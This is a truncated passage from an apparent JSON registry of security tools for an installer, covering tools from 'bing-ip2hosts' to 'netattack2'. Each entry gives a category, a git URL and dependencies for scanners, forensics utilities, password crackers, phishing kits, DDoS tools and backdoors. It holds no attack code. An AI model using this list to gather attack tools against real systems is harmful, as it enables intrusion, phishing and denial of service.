"package_name" : "bing-ip2hosts", 1213 | "category" : ["information_gathering"], 1214 | "url" : "https://github.com/urbanadventurer/bing-ip2hosts.git", 1215 | "package_manager" : "git", 1216 | "dependency" : ["git"] 1217 | }, 1218 | "binwalk" : { 1219 | "name" : "binwalk", 1220 | "package_name" : "binwalk", 1221 | "category" : ["forensics_tools"], 1222 | "url" : "https://github.com/ReFirmLabs/binwalk.git", 1223 | "package_manager" : "git", 1224 | "dependency" : ["python","git"] 1225 | }, 1226 | "blackbox" : { 1227 | "name" : "blackbox", 1228 | "package_name" : "blackbox", 1229 | "category" : ["vulnerability_scanner","exploitation_tools"], 1230 | "url" : "https://github.com/jothatron/blackbox.git", 1231 | "package_manager" : "git", 1232 | "dependency" : ["python","git"] 1233 | }, 1234 | "bleachbit" : { 1235 | "name" : "bleachbit", 1236 | "package_name" : "bleachbit", 1237 | "category" : [null], 1238 | "url" : "https://github.com/bleachbit/bleachbit.git", 1239 | "package_manager" : "git", 1240 | "dependency" : ["python","git"] 1241 | }, 1242 | "braa" : { 1243 | "name" : "braa", 1244 | "package_name" : "braa", 1245 | "category" : ["information_gathering"], 1246 | "url" : "https://github.com/mteg/braa.git", 1247 | "package_manager" : "git", 1248 | "dependency" : ["clang","gcc","git"] 1249 | }, 1250 | "brutespray" : { 1251 | "name" : "brutespray", 1252 | "package_name" : "brutespray", 1253 | "category" : [null], 1254 | "url" : "https://github.com/x90skysn3k/brutespray.git", 1255 | "package_manager" : "git", 1256 | "dependency" : ["python","git"] 1257 | }, 1258 | "bulk_extractor" : { 1259 | "name" : "bulk_extractor", 1260 | "package_name" : "bulk_extractor", 1261 | "category" : ["forensics_tools"], 1262 | "url" : "https://github.com/simsong/bulk_extractor.git", 1263 | "package_manager" : "git", 1264 | "dependency" : ["clang","gcc","g++","git"] 1265 | }, 1266 | "c++" : { 1267 | "name" : "c++", 1268 | "package_name" : "gpp", 1269 | "category" : ["programming_language"], 1270 | "url" : null, 1271 | "package_manager" : "package_manager", 1272 | "dependency" : [null] 1273 | }, 1274 | "capstone" : { 1275 | "name" : "capstone", 1276 | "package_name" : "capstone", 1277 | "category" : ["forensics_tools"], 1278 | "url" : "https://github.com/aquynh/capstone.git", 1279 | "package_manager" : "git", 1280 | "dependency" : ["clang","gcc","python","git"] 1281 | }, 1282 | "catphish" : { 1283 | "name" : "catphish", 1284 | "package_name" : "catphish", 1285 | "category" : [null], 1286 | "url" : "https://github.com/ring0lab/catphish.git", 1287 | "package_manager" : "git", 1288 | "dependency" : ["ruby","git"] 1289 | }, 1290 | "cdpsnarf" : { 1291 | "name" : "cdpsnarf", 1292 | "package_name" : "cdpsnarf", 1293 | "category" : ["information_gathering"], 1294 | "url" : "https://github.com/Zapotek/cdpsnarf.git", 1295 | "package_manager" : "git", 1296 | "dependency" : ["clang","gcc","git"] 1297 | }, 1298 | "clang" : { 1299 | "name" : "clang", 1300 | "package_name" : "clang", 1301 | "category" : ["programming_language"], 1302 | "url" : null, 1303 | "package_manager" : "package_manager", 1304 | "dependency" : [null] 1305 | }, 1306 | "commix" : { 1307 | "name" : "commix", 1308 | "package_name" : "commix", 1309 | "category" : ["exploitation_tools","web_hacking"], 1310 | "url" : "https://github.com/commixproject/commix.git", 1311 | "package_manager" : "git", 1312 | "dependency" : ["python","git"] 1313 | }, 1314 | "cowpatty" : { 1315 | "name" : "cowpatty", 1316 | "package_name" : "cowpatty", 1317 | "category" : ["wireless_testing"], 1318 | "url" : "https://github.com/joswr1ght/cowpatty.git", 1319 | "package_manager" : "git", 1320 | "dependency" : ["clang","gcc","git"] 1321 | }, 1322 | "cpscan" : { 1323 | "name" : "cpscan", 1324 | "package_name" : "cpscan", 1325 | "category" : [null], 1326 | "url" : "https://github.com/susmithHCK/cpscan.git", 1327 | "package_manager" : "git", 1328 | "dependency" : ["python","git"] 1329 | }, 1330 | "crackle" : { 1331 | "name" : "crackle", 1332 | "package_name" : "crackle", 1333 | "category" : ["exploitation_tools","wireless_testing"], 1334 | "url" : "https://github.com/mikeryan/crackle.git", 1335 | "package_manager" : "git", 1336 | "dependency" : ["clang","gcc","perl","git"] 1337 | }, 1338 | "creddump" : { 1339 | "name" : "creddump", 1340 | "package_name" : "creddump", 1341 | "category" : ["password_attack"], 1342 | "url" : "https://github.com/moyix/creddump.git", 1343 | "package_manager" : "git", 1344 | "dependency" : ["python","git"] 1345 | }, 1346 | "credmap" : { 1347 | "name" : "credmap", 1348 | "package_name" : "credmap", 1349 | "category" : [null], 1350 | "url" : "https://github.com/lightos/credmap.git", 1351 | "package_manager" : "git", 1352 | "dependency" : ["python","git"] 1353 | }, 1354 | "crowbar" : { 1355 | "name" : "crowbar", 1356 | "package_name" : "crowbar", 1357 | "category" : ["password_attack"], 1358 | "url" : "https://github.com/galkan/crowbar.git", 1359 | "package_manager" : "git", 1360 | "dependency" : ["python","git"] 1361 | }, 1362 | "cuckoo" : { 1363 | "name" : "cuckoo", 1364 | "package_name" : "cuckoo", 1365 | "category" : ["forensics_tools"], 1366 | "url" : "https://github.com/cuckoosandbox/cuckoo.git", 1367 | "package_manager" : "git", 1368 | "dependency" : ["python","git"] 1369 | }, 1370 | "cupp" : { 1371 | "name" : "cupp", 1372 | "package_name" : "cupp", 1373 | "category" : ["password_attack"], 1374 | "url" : "https://github.com/Mebus/cupp.git", 1375 | "package_manager" : "git", 1376 | "dependency" : ["python","git"] 1377 | }, 1378 | "curl" : { 1379 | "name" : "curl", 1380 | "package_name" : "curl", 1381 | "category" : ["package"], 1382 | "url" : null, 1383 | "package_manager" : "package_manager", 1384 | "dependency" : [null] 1385 | }, 1386 | "c" : { 1387 | "name" : "c", 1388 | "package_name" : "clang", 1389 | "category" : ["programming_language"], 1390 | "url" : null, 1391 | "package_manager" : "package_manager", 1392 | "dependency" : [null] 1393 | }, 1394 | "dbd" : { 1395 | "name" : "dbd", 1396 | "package_name" : "dbd", 1397 | "category" : ["maintaining_access"], 1398 | "url" : "https://github.com/gitdurandal/dbd.git", 1399 | "package_manager" : "git", 1400 | "dependency" : ["clang","gcc","git"] 1401 | }, 1402 | "deblaze" : { 1403 | "name" : "deblaze", 1404 | "package_name" : "deblaze", 1405 | "category" : ["web_hacking"], 1406 | "url" : "https://github.com/SpiderLabs/deblaze.git", 1407 | "package_manager" : "git", 1408 | "dependency" : ["clang","gcc","python","git"] 1409 | }, 1410 | "dedsploit" : { 1411 | "name" : "dedsploit", 1412 | "package_name" : "dedsploit", 1413 | "category" : [null], 1414 | "url" : "https://github.com/ex0dus-0x/dedsploit.git", 1415 | "package_manager" : "git", 1416 | "dependency" : ["python","git"] 1417 | }, 1418 | "demiguise" : { 1419 | "name" : "demiguise", 1420 | "package_name" : "demiguise", 1421 | "category" : [null], 1422 | "url" : "https://github.com/nccgroup/demiguise.git", 1423 | "package_manager" : "git", 1424 | "dependency" : ["python","git"] 1425 | }, 1426 | "distorm" : { 1427 | "name" : "distorm", 1428 | "package_name" : "distorm", 1429 | "category" : ["forensics_tools"], 1430 | "url" : "https://github.com/gdabah/distorm.git", 1431 | "package_manager" : "git", 1432 | "dependency" : ["clang","gcc","python","git"] 1433 | }, 1434 | "djangohunter" : { 1435 | "name" : "djangohunter", 1436 | "package_name" : "djangohunter", 1437 | "category" : [null], 1438 | "url" : "https://github.com/6IX7ine/djangohunter.git", 1439 | "package_manager" : "git", 1440 | "dependency" : ["python","git"] 1441 | }, 1442 | "dmitry" : { 1443 | "name" : "dmitry", 1444 | "package_name" : "dmitry", 1445 | "category" : ["information_gathering"], 1446 | "url" : "https://github.com/jaygreig86/dmitry.git", 1447 | "package_manager" : "git", 1448 | "dependency" : ["clang","gcc","git"] 1449 | }, 1450 | "dnschef" : { 1451 | "name" : "dnschef", 1452 | "package_name" : "dnschef", 1453 | "category" : ["sniffing_spoofing"], 1454 | "url" : "https://gitlab.com/kalilinux/packages/dnschef.git", 1455 | "package_manager" : "git", 1456 | "dependency" : ["python","git"] 1457 | }, 1458 | "dnsenum" : { 1459 | "name" : "dnsenum", 1460 | "package_name" : "dnsenum", 1461 | "category" : ["information_gathering"], 1462 | "url" : "https://github.com/fwaeytens/dnsenum.git", 1463 | "package_manager" : "git", 1464 | "dependency" : ["perl","git"] 1465 | }, 1466 | "dnsmap" : { 1467 | "name" : "dnsmap", 1468 | "package_name" : "dnsmap", 1469 | "category" : ["information_gathering"], 1470 | "url" : "https://github.com/makefu/dnsmap.git", 1471 | "package_manager" : "git", 1472 | "dependency" : ["clang","gcc","git"] 1473 | }, 1474 | "dnsrecon" : { 1475 | "name" : "dnsrecon", 1476 | "package_name" : "dnsrecon", 1477 | "category" : ["information_gathering"], 1478 | "url" : "https://github.com/darkoperator/dnsrecon.git", 1479 | "package_manager" : "git", 1480 | "dependency" : ["python","ruby","git"] 1481 | }, 1482 | "doona" : { 1483 | "name" : "doona", 1484 | "package_name" : "doona", 1485 | "category" : ["vulnerability_scanner"], 1486 | "url" : "https://github.com/wireghoul/doona.git", 1487 | "package_manager" : "git", 1488 | "dependency" : ["perl","git"] 1489 | }, 1490 | "doork" : { 1491 | "name" : "doork", 1492 | "package_name" : "doork", 1493 | "category" : ["information_gathering","web_hacking"], 1494 | "url" : "https://github.com/AeonDave/doork.git", 1495 | "package_manager" : "git", 1496 | "dependency" : ["python","git"] 1497 | }, 1498 | "dotdotpwn" : { 1499 | "name" : "dotdotpwn", 1500 | "package_name" : "dotdotpwn", 1501 | "category" : ["information_gathering","vulnerability_scanner"], 1502 | "url" : "https://github.com/wireghoul/dotdotpwn.git", 1503 | "package_manager" : "git", 1504 | "dependency" : ["perl","git"] 1505 | }, 1506 | "dumpzilla" : { 1507 | "name" : "dumpzilla", 1508 | "package_name" : "dumpzilla", 1509 | "category" : ["forensics_tools"], 1510 | "url" : "https://gitlab.com/kalilinux/packages/dumpzilla.git", 1511 | "package_manager" : "git", 1512 | "dependency" : ["python","git"] 1513 | }, 1514 | "eaphammer" : { 1515 | "name" : "eaphammer", 1516 | "package_name" : "eaphammer", 1517 | "category" : [null], 1518 | "url" : "https://github.com/s0lst1c3/eaphammer.git", 1519 | "package_manager" : "git", 1520 | "dependency" : ["python","git"] 1521 | }, 1522 | "elpscrk" : { 1523 | "name" : "elpscrk", 1524 | "package_name" : "elpscrk", 1525 | "category" : [null], 1526 | "url" : "https://github.com/D4Vinci/elpscrk.git", 1527 | "package_manager" : "git", 1528 | "dependency" : ["python","git"] 1529 | }, 1530 | "enum4linux" : { 1531 | "name" : "enum4linux", 1532 | "package_name" : "enum4linux", 1533 | "category" : ["information_gathering"], 1534 | "url" : "https://github.com/portcullislabs/enum4linux.git", 1535 | "package_manager" : "git", 1536 | "dependency" : ["perl","git"] 1537 | }, 1538 | "eternal_scanner" : { 1539 | "name" : "eternal_scanner", 1540 | "package_name" : "eternal_scanner", 1541 | "category" : [null], 1542 | "url" : "https://github.com/peterpt/eternal_scanner.git", 1543 | "package_manager" : "git", 1544 | "dependency" : ["python","git"] 1545 | }, 1546 | "evilginx" : { 1547 | "name" : "evilginx", 1548 | "package_name" : "evilginx", 1549 | "category" : [null], 1550 | "url" : "https://github.com/kgretzky/evilginx.git", 1551 | "package_manager" : "git", 1552 | "dependency" : ["python","git"] 1553 | }, 1554 | "exploitdb" : { 1555 | "name" : "exploitdb", 1556 | "package_name" : "exploitdb", 1557 | "category" : ["exploitation_tools"], 1558 | "url" : "https://github.com/offensive-security/exploitdb.git", 1559 | "package_manager" : "git", 1560 | "dependency" : ["clang","gcc","python","git"] 1561 | }, 1562 | "extundelete" : { 1563 | "name" : "extundelete", 1564 | "package_name" : "extundelete", 1565 | "category" : ["forensics_tools"], 1566 | "url" : "https://gitlab.com/kalilinux/packages/extundelete.git", 1567 | "package_manager" : "git", 1568 | "dependency" : ["clang","gcc","g++","python","git"] 1569 | }, 1570 | "ezsploit" : { 1571 | "name" : "ezsploit", 1572 | "package_name" : "ezsploit", 1573 | "category" : [null], 1574 | "url" : "https://github.com/rand0m1ze/ezsploit.git", 1575 | "package_manager" : "git", 1576 | "dependency" : ["git"] 1577 | }, 1578 | "faraday" : { 1579 | "name" : "faraday", 1580 | "package_name" : "faraday", 1581 | "category" : ["information_gathering"], 1582 | "url" : "https://github.com/infobyte/faraday.git", 1583 | "package_manager" : "git", 1584 | "dependency" : ["python","git"] 1585 | }, 1586 | "fbht" : { 1587 | "name" : "fbht", 1588 | "package_name" : "fbht", 1589 | "category" : [null], 1590 | "url" : "https://github.com/chinoogawa/fbht.git", 1591 | "package_manager" : "git", 1592 | "dependency" : ["python","git"] 1593 | }, 1594 | "fbvid" : { 1595 | "name" : "fbvid", 1596 | "package_name" : "fbvid", 1597 | "category" : [null], 1598 | "url" : "https://github.com/Tuhinshubhra/fbvid.git", 1599 | "package_manager" : "git", 1600 | "dependency" : ["php","git"] 1601 | }, 1602 | "fern-wifi-cracker" : { 1603 | "name" : "fern-wifi-cracker", 1604 | "package_name" : "fern-wifi-cracker", 1605 | "category" : ["wireless_testing"], 1606 | "url" : "https://github.com/savio-code/fern-wifi-cracker.git", 1607 | "package_manager" : "git", 1608 | "dependency" : ["python","git"] 1609 | }, 1610 | "fierce" : { 1611 | "name" : "fierce", 1612 | "package_name" : "fierce", 1613 | "category" : ["information_gathering"], 1614 | "url" : "https://github.com/mschwager/fierce.git", 1615 | "package_manager" : "git", 1616 | "dependency" : ["python","git"] 1617 | }, 1618 | "figlet" : { 1619 | "name" : "figlet", 1620 | "package_name" : "figlet", 1621 | "category" : ["package"], 1622 | "url" : null, 1623 | "package_manager" : "package_manager", 1624 | "dependency" : [null] 1625 | }, 1626 | "findmyhash" : { 1627 | "name" : "findmyhash", 1628 | "package_name" : "findmyhash", 1629 | "category" : ["password_attack"], 1630 | "url" : "https://gitlab.com/kalilinux/packages/findmyhash.git", 1631 | "package_manager" : "git", 1632 | "dependency" : ["python","git"] 1633 | }, 1634 | "firewalk" : { 1635 | "name" : "firewalk", 1636 | "package_name" : "firewalk", 1637 | "category" : ["information_gathering"], 1638 | "url" : "https://gitlab.com/kalilinux/packages/firewalk.git", 1639 | "package_manager" : "git", 1640 | "dependency" : ["clang","gcc","git"] 1641 | }, 1642 | "fluxion" : { 1643 | "name" : "fluxion", 1644 | "package_name" : "fluxion", 1645 | "category" : ["wireless_testing"], 1646 | "url" : "https://github.com/FluxionNetwork/fluxion.git", 1647 | "package_manager" : "git", 1648 | "dependency" : ["git"] 1649 | }, 1650 | "foremost" : { 1651 | "name" : "foremost", 1652 | "package_name" : "foremost", 1653 | "category" : ["forensics_tools"], 1654 | "url" : "https://gitlab.com/kalilinux/packages/foremost.git", 1655 | "package_manager" : "git", 1656 | "dependency" : ["clang","gcc","git"] 1657 | }, 1658 | "fragrouter" : { 1659 | "name" : "fragrouter", 1660 | "package_name" : "fragrouter", 1661 | "category" : ["information_gathering"], 1662 | "url" : "https://gitlab.com/kalilinux/packages/fragrouter.git", 1663 | "package_manager" : "git", 1664 | "dependency" : ["clang","gcc","git"] 1665 | }, 1666 | "fragroute" : { 1667 | "name" : "fragroute", 1668 | "package_name" : "fragroute", 1669 | "category" : ["information_gathering"], 1670 | "url" : "https://gitlab.com/kalilinux/packages/fragroute.git", 1671 | "package_manager" : "git", 1672 | "dependency" : ["clang","gcc","git"] 1673 | }, 1674 | "fsociety" : { 1675 | "name" : "fsociety", 1676 | "package_name" : "fsociety", 1677 | "category" : [null], 1678 | "url" : "https://github.com/Manisso/fsociety.git", 1679 | "package_manager" : "git", 1680 | "dependency" : ["python","git"] 1681 | }, 1682 | "fuckshitup" : { 1683 | "name" : "fuckshitup", 1684 | "package_name" : "fuckshitup", 1685 | "category" : [null], 1686 | "url" : "https://github.com/Smaash/fuckshitup.git", 1687 | "package_manager" : "git", 1688 | "dependency" : ["php","git"] 1689 | }, 1690 | "fuxploider" : { 1691 | "name" : "fuxploider", 1692 | "package_name" : "fuxploider", 1693 | "category" : [null], 1694 | "url" : "https://github.com/almandin/fuxploider.git", 1695 | "package_manager" : "git", 1696 | "dependency" : ["python","git"] 1697 | }, 1698 | "gasmask" : { 1699 | "name" : "gasmask", 1700 | "package_name" : "gasmask", 1701 | "category" : [null], 1702 | "url" : "https://github.com/twelvesec/gasmask.git", 1703 | "package_manager" : "git", 1704 | "dependency" : ["python","git"] 1705 | }, 1706 | "gcat" : { 1707 | "name" : "gcat", 1708 | "package_name" : "gcat", 1709 | "category" : [null], 1710 | "url" : "https://github.com/byt3bl33d3r/gcat.git", 1711 | "package_manager" : "git", 1712 | "dependency" : ["python","git"] 1713 | }, 1714 | "get" : { 1715 | "name" : "get", 1716 | "package_name" : "get", 1717 | "category" : [null], 1718 | "url" : "https://github.com/peterpt/get.git", 1719 | "package_manager" : "git", 1720 | "dependency" : ["git"] 1721 | }, 1722 | "ghost-phisher" : { 1723 | "name" : "ghost-phisher", 1724 | "package_name" : "ghost-phisher", 1725 | "category" : ["information_gathering"], 1726 | "url" : "https://github.com/savio-code/ghost-phisher.git", 1727 | "package_manager" : "git", 1728 | "dependency" : ["python","git"] 1729 | }, 1730 | "giskismet" : { 1731 | "name" : "giskismet", 1732 | "package_name" : "giskismet", 1733 | "category" : ["wireless_testing"], 1734 | "url" : "https://github.com/xtr4nge/giskismet.git", 1735 | "package_manager" : "git", 1736 | "dependency" : ["perl","git"] 1737 | }, 1738 | "git" : { 1739 | "name" : "git", 1740 | "package_name" : "git", 1741 | "category" : ["package"], 1742 | "url" : null, 1743 | "package_manager" : "package_manager", 1744 | "dependency" : [null] 1745 | }, 1746 | "gobuster" : { 1747 | "name" : "gobuster", 1748 | "package_name" : "gobuster", 1749 | "category" : ["web_hacking"], 1750 | "url" : "https://github.com/OJ/gobuster.git", 1751 | "package_manager" : "git", 1752 | "dependency" : ["golang","git"] 1753 | }, 1754 | "golang" : { 1755 | "name" : "golang", 1756 | "package_name" : "golang", 1757 | "category" : ["programming_language"], 1758 | "url" : null, 1759 | "package_manager" : "package_manager", 1760 | "dependency" : [null] 1761 | }, 1762 | "golismero" : { 1763 | "name" : "golismero", 1764 | "package_name" : "golismero", 1765 | "category" : ["information_gathering"], 1766 | "url" : "https://github.com/golismero/golismero.git", 1767 | "package_manager" : "git", 1768 | "dependency" : ["python","git"] 1769 | }, 1770 | "goofile" : { 1771 | "name" : "goofile", 1772 | "package_name" : "goofile", 1773 | "category" : ["information_gathering"], 1774 | "url" : "https://gitlab.com/kalilinux/packages/goofile.git", 1775 | "package_manager" : "git", 1776 | "dependency" : ["python","git"] 1777 | }, 1778 | "gcc" : { 1779 | "name" : "gcc", 1780 | "package_name" : "gcc", 1781 | "category" : ["programming_language"], 1782 | "url" : null, 1783 | "package_manager" : "package_manager", 1784 | "dependency" : [null] 1785 | }, 1786 | "hURL" : { 1787 | "name" : "hURL", 1788 | "package_name" : "hURL", 1789 | "category" : ["web_hacking"], 1790 | "url" : "https://github.com/fnord0/hURL.git", 1791 | "package_manager" : "git", 1792 | "dependency" : ["perl","git"] 1793 | }, 1794 | "hacktronian" : { 1795 | "name" : "hacktronian", 1796 | "package_name" : "hacktronian", 1797 | "category" : [null], 1798 | "url" : "https://github.com/thehackingsage/hacktronian.git", 1799 | "package_manager" : "git", 1800 | "dependency" : ["git"] 1801 | }, 1802 | "hakkuframework" : { 1803 | "name" : "hakkuframework", 1804 | "package_name" : "hakkuframework", 1805 | "category" : [null], 1806 | "url" : "https://github.com/4shadoww/hakkuframework.git", 1807 | "package_manager" : "git", 1808 | "dependency" : ["python","git"] 1809 | }, 1810 | "hammer" : { 1811 | "name" : "hammer", 1812 | "package_name" : "hammer", 1813 | "category" : ["ddos"], 1814 | "url" : "https://github.com/cyweb/hammer.git", 1815 | "package_manager" : "git", 1816 | "dependency" : ["python","git"] 1817 | }, 1818 | "hash-generator" : { 1819 | "name" : "hash-generator", 1820 | "package_name" : "hash-generator", 1821 | "category" : ["password_attack"], 1822 | "url" : "https://github.com/CiKu370/hash-generator.git", 1823 | "package_manager" : "git", 1824 | "dependency" : ["python","git"] 1825 | }, 1826 | "hashcat" : { 1827 | "name" : "hashcat", 1828 | "package_name" : "hashcat", 1829 | "category" : ["password_attack"], 1830 | "url" : "https://github.com/hashcat/hashcat.git", 1831 | "package_manager" : "git", 1832 | "dependency" : ["clang","gcc","git"] 1833 | }, 1834 | "hasherdotid" : { 1835 | "name" : "hasherdotid", 1836 | "package_name" : "hasherdotid", 1837 | "category" : ["password_attack"], 1838 | "url" : "https://github.com/galauerscrew/hasherdotid.git", 1839 | "package_manager" : "git", 1840 | "dependency" : ["python","git"] 1841 | }, 1842 | "hasher" : { 1843 | "name" : "hasher", 1844 | "package_name" : "hasher", 1845 | "category" : ["password_attack"], 1846 | "url" : "https://github.com/CiKu370/hasher.git", 1847 | "package_manager" : "git", 1848 | "dependency" : ["python","git"] 1849 | }, 1850 | "httptunnel" : { 1851 | "name" : "httptunnel", 1852 | "package_name" : "httptunnel", 1853 | "category" : ["maintaining_access"], 1854 | "url" : "https://github.com/larsbrinkhoff/httptunnel.git", 1855 | "package_manager" : "git", 1856 | "dependency" : ["clang","gcc","git"] 1857 | }, 1858 | "hulk" : { 1859 | "name" : "hulk", 1860 | "package_name" : "hulk", 1861 | "category" : ["ddos"], 1862 | "url" : "https://github.com/grafov/hulk.git", 1863 | "package_manager" : "git", 1864 | "dependency" : ["python","git"] 1865 | }, 1866 | "hydra" : { 1867 | "name" : "hydra", 1868 | "package_name" : "hydra", 1869 | "category" : ["stress_testing","password_attack"], 1870 | "url" : null, 1871 | "package_manager" : "package_manager", 1872 | "dependency" : [null] 1873 | }, 1874 | "iSMTP" : { 1875 | "name" : "iSMTP", 1876 | "package_name" : "ipwn", 1877 | "category" : ["information_gathering"], 1878 | "url" : "https://github.com/altjx/ipwn.git", 1879 | "package_manager" : "git", 1880 | "dependency" : ["python","git"] 1881 | }, 1882 | "intrace" : { 1883 | "name" : "intrace", 1884 | "package_name" : "intrace", 1885 | "category" : ["information_gathering"], 1886 | "url" : "https://github.com/robertswiecki/intrace.git", 1887 | "package_manager" : "git", 1888 | "dependency" : ["clang","gcc","git"] 1889 | }, 1890 | "jboss-autopwn" : { 1891 | "name" : "jboss-autopwn", 1892 | "package_name" : "jboss-autopwn", 1893 | "category" : [null], 1894 | "url" : "https://github.com/SpiderLabs/jboss-autopwn.git", 1895 | "package_manager" : "git", 1896 | "dependency" : ["git"] 1897 | }, 1898 | "johnny" : { 1899 | "name" : "johnny", 1900 | "package_name" : "johnny", 1901 | "category" : ["password_attack"], 1902 | "url" : "https://github.com/shinnok/johnny.git", 1903 | "package_manager" : "git", 1904 | "dependency" : ["clang","gcc","g++","git"] 1905 | }, 1906 | "joomscan" : { 1907 | "name" : "joomscan", 1908 | "package_name" : "joomscan", 1909 | "category" : ["web_hacking"], 1910 | "url" : "https://github.com/rezasp/joomscan.git", 1911 | "package_manager" : "git", 1912 | "dependency" : ["perl","git"] 1913 | }, 1914 | "jsql-injection" : { 1915 | "name" : "jsql-injection", 1916 | "package_name" : "jsql-injection", 1917 | "category" : ["vulnerability_scanner"], 1918 | "url" : "https://github.com/ron190/jsql-injection.git", 1919 | "package_manager" : "git", 1920 | "dependency" : ["php","git"] 1921 | }, 1922 | "kalibrate-rtl" : { 1923 | "name" : "kalibrate-rtl", 1924 | "package_name" : "kalibrate-rtl", 1925 | "category" : ["wireless_testing"], 1926 | "url" : "https://github.com/steve-m/kalibrate-rtl.git", 1927 | "package_manager" : "git", 1928 | "dependency" : ["clang","gcc","g++","git"] 1929 | }, 1930 | "keimpx" : { 1931 | "name" : "keimpx", 1932 | "package_name" : "keimpx", 1933 | "category" : ["password_attack"], 1934 | "url" : "https://github.com/inquisb/keimpx.git", 1935 | "package_manager" : "git", 1936 | "dependency" : ["python","git"] 1937 | }, 1938 | "kickthemout" : { 1939 | "name" : "kickthemout", 1940 | "package_name" : "kickthemout", 1941 | "category" : ["wireless_testing"], 1942 | "url" : "https://github.com/k4m4/kickthemout.git", 1943 | "package_manager" : "git", 1944 | "dependency" : ["python","git"] 1945 | }, 1946 | "killchain" : { 1947 | "name" : "killchain", 1948 | "package_name" : "killchain", 1949 | "category" : [null], 1950 | "url" : "https://github.com/ruped24/killchain.git", 1951 | "package_manager" : "git", 1952 | "dependency" : ["python","git"] 1953 | }, 1954 | "killerbee" : { 1955 | "name" : "killerbee", 1956 | "package_name" : "killerbee", 1957 | "category" : ["wireless_testing"], 1958 | "url" : "https://github.com/riverloopsec/killerbee.git", 1959 | "package_manager" : "git", 1960 | "dependency" : ["python","clang","gcc","g++","git"] 1961 | }, 1962 | "killshot" : { 1963 | "name" : "killshot", 1964 | "package_name" : "killshot", 1965 | "category" : [null], 1966 | "url" : "https://github.com/bahaabdelwahed/killshot.git", 1967 | "package_manager" : "git", 1968 | "dependency" : ["ruby","git"] 1969 | }, 1970 | "koadic" : { 1971 | "name" : "koadic", 1972 | "package_name" : "koadic", 1973 | "category" : [null], 1974 | "url" : "https://github.com/zerosum0x0/koadic.git", 1975 | "package_manager" : "git", 1976 | "dependency" : ["python","git"] 1977 | }, 1978 | "kwetza" : { 1979 | "name" : "kwetza", 1980 | "package_name" : "kwetza", 1981 | "category" : [null], 1982 | "url" : "https://github.com/sensepost/kwetza.git", 1983 | "package_manager" : "git", 1984 | "dependency" : ["python","git"] 1985 | }, 1986 | "leviathan" : { 1987 | "name" : "leviathan", 1988 | "package_name" : "leviathan", 1989 | "category" : [null], 1990 | "url" : "https://github.com/tearsecurity/leviathan.git", 1991 | "package_manager" : "git", 1992 | "dependency" : ["python","git"] 1993 | }, 1994 | "lscript" : { 1995 | "name" : "lscript", 1996 | "package_name" : "lscript", 1997 | "category" : [null], 1998 | "url" : "https://github.com/arismelachroinos/lscript.git", 1999 | "package_manager" : "git", 2000 | "dependency" : ["git"] 2001 | }, 2002 | "lynis" : { 2003 | "name" : "lynis", 2004 | "package_name" : "lynis", 2005 | "category" : ["vulnerability_scanner"], 2006 | "url" : "https://github.com/CISOfy/lynis.git", 2007 | "package_manager" : "git", 2008 | "dependency" : ["git"] 2009 | }, 2010 | "maskphish" : { 2011 | "name" : "maskphish", 2012 | "package_name" : "maskphish", 2013 | "category" : ["sniffing_spoofing"], 2014 | "url" : "https://github.com/jaykali/maskphish.git", 2015 | "package_manager" : "git", 2016 | "dependency" : ["curl","git"] 2017 | }, 2018 | "maskprocessor" : { 2019 | "name" : "maskprocessor", 2020 | "package_name" : "maskprocessor", 2021 | "category" : ["password_attack"], 2022 | "url" : "https://github.com/hashcat/maskprocessor.git", 2023 | "package_manager" : "git", 2024 | "dependency" : ["clang","gcc","git"] 2025 | }, 2026 | "masscan" : { 2027 | "name" : "masscan", 2028 | "package_name" : "masscan", 2029 | "category" : ["information_gathering"], 2030 | "url" : "https://github.com/robertdavidgraham/masscan.git", 2031 | "package_manager" : "git", 2032 | "dependency" : ["clang","gcc","git"] 2033 | }, 2034 | "metasploit-framework" : { 2035 | "name" : "metasploit-framework", 2036 | "package_name" : "msfinstall", 2037 | "category" : ["exploitation_tools"], 2038 | "url" : "https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb", 2039 | "package_manager" : "curl", 2040 | "dependency" : ["curl"] 2041 | }, 2042 | "mfcuk" : { 2043 | "name" : "mfcuk", 2044 | "package_name" : "mfcuk", 2045 | "category" : ["wireless_testing"], 2046 | "url" : "https://github.com/nfc-tools/mfcuk.git", 2047 | "package_manager" : "git", 2048 | "dependency" : ["clang","gcc","git"] 2049 | }, 2050 | "mfoc" : { 2051 | "name" : "mfoc", 2052 | "package_name" : "mfoc", 2053 | "category" : ["wireless_testing"], 2054 | "url" : "https://github.com/nfc-tools/mfoc.git", 2055 | "package_manager" : "git", 2056 | "dependency" : ["clang","gcc","git"] 2057 | }, 2058 | "mfterm" : { 2059 | "name" : "mfterm", 2060 | "package_name" : "mfterm", 2061 | "category" : ["wireless_testing"], 2062 | "url" : "https://github.com/4ZM/mfterm.git", 2063 | "package_manager" : "git", 2064 | "dependency" : ["clang","gcc","git"] 2065 | }, 2066 | "mitmproxy" : { 2067 | "name" : "mitmproxy", 2068 | "package_name" : "mitmproxy", 2069 | "category" : ["sniffing_spoofing"], 2070 | "url" : "https://github.com/mitmproxy/mitmproxy.git", 2071 | "package_manager" : "git", 2072 | "dependency" : ["python","git"] 2073 | }, 2074 | "morpheus" : { 2075 | "name" : "morpheus", 2076 | "package_name" : "morpheus", 2077 | "category" : [null], 2078 | "url" : "https://github.com/r00t-3xp10it/morpheus.git", 2079 | "package_manager" : "git", 2080 | "dependency" : ["python","git"] 2081 | }, 2082 | "msfpc" : { 2083 | "name" : "msfpc", 2084 | "package_name" : "msfpc", 2085 | "category" : ["exploitation_tools"], 2086 | "url" : "https://github.com/g0tmi1k/msfpc.git", 2087 | "package_manager" : "git", 2088 | "dependency" : ["git"] 2089 | }, 2090 | "multimon-ng" : { 2091 | "name" : "multimon-ng", 2092 | "package_name" : "multimon-ng", 2093 | "category" : ["wireless_testing"], 2094 | "url" : "https://github.com/EliasOenal/multimon-ng.git", 2095 | "package_manager" : "git", 2096 | "dependency" : ["python","clang","gcc","git"] 2097 | }, 2098 | "nWatch" : { 2099 | "name" : "nWatch", 2100 | "package_name" : "nWatch", 2101 | "category" : [null], 2102 | "url" : "https://github.com/s0cket7/nWatch.git", 2103 | "package_manager" : "git", 2104 | "dependency" : ["python","git"] 2105 | }, 2106 | "nano" : { 2107 | "name" : "nano", 2108 | "package_name" : "nano", 2109 | "category" : ["package"], 2110 | "url" : null, 2111 | "package_manager" : "package_manager", 2112 | "dependency" : [null] 2113 | }, 2114 | "netattack2" : { 2115 | "name" : "netattack2", 2116 | "package_name" : "netattack2", 2117 | "category" : 